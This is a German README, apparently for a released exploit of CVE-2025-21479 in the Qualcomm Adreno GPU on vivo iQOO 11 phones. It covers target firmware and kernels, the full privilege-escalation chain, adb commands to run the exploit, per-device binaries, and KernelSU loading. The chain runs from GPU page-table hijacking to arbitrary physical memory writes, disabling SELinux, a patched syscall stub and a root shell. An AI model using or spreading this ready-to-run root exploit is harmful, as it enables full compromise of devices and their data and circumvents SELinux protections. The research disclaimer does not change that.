
CVE-2025-21479 (Qualcomm Adreno GPU) Reproduktionsnotizen für vivo iQOO 11 Pro (PD2254) – autorisierte Forschung
| Projekt | Wert |
|---|---|
| Gerät | vivo iQOO 11 Pro (PD2254 / V2254A) |
| System | Android 15, PD2254B_A_15.2.12.2.W10 |
| Kernel | 5.15.178-g3dc7c01077b8-dirty |
| SoC | Snapdragon 8 Gen 2 (SM8550 / kalama) |
| GPU | Adreno 740, OpenGL ES 3.2 [email protected] |
Aufgrund der Einschränkungen der aktuellen Methode wurde die Extraktion von kallsyms zur Laufzeit nicht implementiert, daher sind außer den oben genannten drei Versionen theoretisch alle anderen Versionen nicht kompatibel.
GPU spray (SMMU Seitentabellen-Hijacking, 27 Kandidaten-Physikadressen)
→ beliebiges physisches Speicher-Lesen/Schreiben
→ SELinux enforcing → permissive (physisches Schreiben von selinux_state)
→ patch __arm64_sys_vhangup (syscall #58, wird von Android nicht aufgerufen)
GPU schreibt direkt 96-Byte-Stub (commit_creds(prepare_kernel_cred(NULL)))
→ fork Kindprozess → syscall(58) → uid=0
→ setexeccon: schreibe /proc/self/attr/exec = "u:r:shell:s0"
→ exec root shell (uid=0, Domäne = u:r:shell:s0)
Ausführen:
adb push exploit /data/local/tmp/exploit
adb shell
chmod 755 /data/local/tmp/exploit
cd /data/local/tmp && ./exploit

Root-Berechtigungsverwaltung:
find /data/app -type d | grep resukisu
/data/app/***/***/lib/arm64/libksud.so insmod kernelsu.ko
Dieses Projekt dient ausschließlich Sicherheitsforschung und Lernzwecken. Bitte nur auf eigenen Geräten testen. Der Benutzer trägt alle Konsequenzen, die durch die Verwendung dieses Projekts entstehen, einschließlich, aber nicht beschränkt auf Geräteschäden, Datenverlust usw. Verwenden Sie dieses Projekt nicht für illegale Zwecke.
| Modell | Firmware | Kernel | Binärdatei |
|---|
| iQOO 11 Pro (PD2254) | PD2254B_A_15.2.12.2.W10 | 5.15.178-g3dc7c01077b8-dirty | exploit_11pro |
| iQOO 11s (PD2304) | PD2304B_A_15.2.12.1.W10 | 5.15.178-g844f85161cd7-dirty | exploit_11s |
| iQOO 11 (PD2243) | PD2243B_A_15.2.16.1.W10 | 5.15.178-g0ae61da50a34-dirty | exploit_11 |